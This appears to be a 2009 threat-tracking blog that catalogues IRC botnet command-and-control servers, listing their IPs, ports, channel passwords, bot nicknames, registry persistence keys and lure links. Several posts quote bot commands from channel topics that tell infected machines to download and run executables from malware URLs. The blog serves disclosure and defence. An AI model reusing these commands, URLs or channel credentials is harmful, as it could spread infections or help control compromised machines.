74.40.134.42:9595
Channel: ##esp, ##rus
NICK: {00-RUS-XP-SKLA-1644}
IDENT: MEAT
Saturday, July 25, 2009
74.40.134.42 (ms08-067) exploit botnet (BLAZEBOT)
Posted by Role at 8:52 AM
Wednesday, July 22, 2009
high.jweles.cn (Hidden)
*** IP of : 85.131.154.57 host high.jweles.cn
85.131.154.57:5555
Channel: #!high! h1ghsh1t
@hidz .msn.msg questa è la tua foto?? :P http://myspace-image.info/viewimage.php?=
NICK [00|USA|171262]
USER 2K-8552 * 0 :DDD-4C95834455D
MODE: [00|USA|171262] -ix
Autostart Path
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Windows Update Service = "msupdate32.exe"
Extract Path
"C:\DOCUME~1\User\LOCALS~1\Temp\IXP000.TMP\reptile.exe"
"C:\WINDOWS\msupdate32.exe"
Posted by Role at 6:26 AM
Monday, July 20, 2009
mail.bestservicestores.com
*** IP of : 76.12.178.4 host mail.bestservicestores.com
76.12.178.4:8890
Nick: b0FAkmaUntzFn1EVh65f45Y1m
Username: XP-SP3
Server Pass: fak
Joined Channel: #zUPLEX with Password fuck
Autostart
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions Melt
C:\Zuplex_025725.exe
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal Windows Service Control C:\Documents and Settings\Administrator\Application Data\zupazxx.exe
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network Windows Service Control C:\Documents and Settings\Administrator\Application Data\zupazxx.exe
Posted by Role at 6:40 AM
Thursday, July 16, 2009
labtec.stupidnsm.cn (Hidden)
*** IP of : 85.131.154.57 host labtec.stupidnsm.cn
85.131.154.57:5555
NICK [00|USA|480852]
USER XP-8638 * 0 :DDD-4C95834455D
MODE [00|USA|480852] -ix
JOIN #!lab! labr0x
Autostart
LM\Software\Microsoft\Windows\CurrentVersion\Run\Windows Dynamic Library Cache "dllcaches.exe"
Posted by Role at 10:02 AM
Wednesday, July 15, 2009
cr4ckr0x.net
*** IP of : 61.136.69.197 host cr4ckr0x.net
61.136.69.197:81
[ Changes to registry ]
* Creates key "HKLM\Software\\Microsoft\\Windows".
* Sets value "Windows Updates"="C:\PROGRA~1\COMMON~1\System\winlogo.exe" in key "HKLM\Software\\Microsoft\\Windows".
* Creates key "HKCU\Software\\Microsoft\\Windows".
* Sets value "Windows Updates"="C:\PROGRA~1\COMMON~1\System\winlogo.exe" in key "HKCU\Software\\Microsoft\\Windows".
Connects to IRC Server.
IRC: Uses nickname mlflODMDdlflhDM.
IRC: Uses username ckmpwuyac.
IRC: Joins channel #scanvnc with password rage.
Posted by Role at 6:58 AM
Tuesday, July 14, 2009
axesor.no-ip.org
*** IP of : 208.77.191.41 host axesor.no-ip.org
208.77.191.41:6667
Nick: pc1426611183
Username: AUT5
Joined Channel: #dbs with Password pwneds
Channel Topic for Channel #dbs: "How knows"
To mark the presence in the system, the following Mutex object was created:
12cFx2FF
The following port was open in the system:
Port Protocol Process
1033 TCP iexplorer.exe (%Windir%\iexplorer.exe)
Posted by Role at 2:56 AM
Monday, July 13, 2009
oao.th3kings.net
*** IP of : 203.154.27.139 host oao.th3kings.net
203.154.27.139:3333
Channel:#!zx!#
Password:zidanag
NICK [00|USA|947039]
USER XP-3986 * 0 :COMPUTERNAME
The newly created Registry Value is:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
windows Live Messenger = "madbbcre.exe"
This makes madbbcre.exe run every time Windows starts.
Malware Url
* CK changes topic to '.msn.msg Estas photo so tuyo? http://picture-sex1.com/myfotohi5.exe?='
Posted by Role at 6:26 PM
Thursday, July 9, 2009
kao.th3kings.net
*** IP of : 203.158.16.157 host kao.th3kings.net
203.158.16.157:3333
Channel:#!zx!#
Password:zidanag
NICK [00|USA|654386]
USER XP-6752 * 0 :COMPUTERNAME
Registry Modifications
The newly created Registry Value is:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
windows Live Messenger = "iexplore.exe"
This makes iexplore.exe run every time Windows starts.
Posted by Role at 5:32 AM
Friday, July 3, 2009
ms.update-host.com (Boom)
ms.update-host.com DNS_TYPE_A 66.225.230.213
66.225.230.213:4244
Nick: [00|USA|749660]
Username: XP-9148
Joined Channel: #!msn! with Password ms
Channel Topic for Channel #!msn!: "D http://msngallery.msnmy-pic.com/image.php?="
Private Message to Channel #!msn!: "msn// Thread Activated: Sending Message."
Private Message to Channel #!msn!: "D http://msngallery.msnmy-pic.com/image.php?="
Private Message to Channel #!msn!: "msn// Thread Disabled."
Private Message to Channel #!msn!: ".login poppen -s"
Posted by Role at 9:31 PM
abc.technigoyous.net (hidden)
*** IP of : 218.61.22.10 host abc.technigoyous.net
218.61.22.10:8585
Nick: [00|USA|203945]
Username: XP-3185
Joined Channel: #client1
Channel Topic for Channel #client1: ".r.getfile http://hi5-gallerys.com/loader.exe C:\sdfvinfo.exe 1"
Private Message to Channel #client1: "download// File download: 21.6KB to: C:\sdfvinfo.exe @ 21.6KB/sec."
Private Message to Channel #client1: "download// Created process: "C:\sdfvinfo.exe", PID: <208>"
Posted by Role at 6:52 AM
Wednesday, July 1, 2009
italian.swiifatecihno.com
*** IP of : 218.61.22.10 host italian.swiifatecihno.com
ok changes topic to '.p.karikar http://hi5-gallerys.com/siwa.exe C:\sihd.exe 1 -s'
218.61.22.10:7763
Nick: fUuFaTLM
Username: pjhakt
Joined Channel: #siwa
Posted by Role at 9:20 PM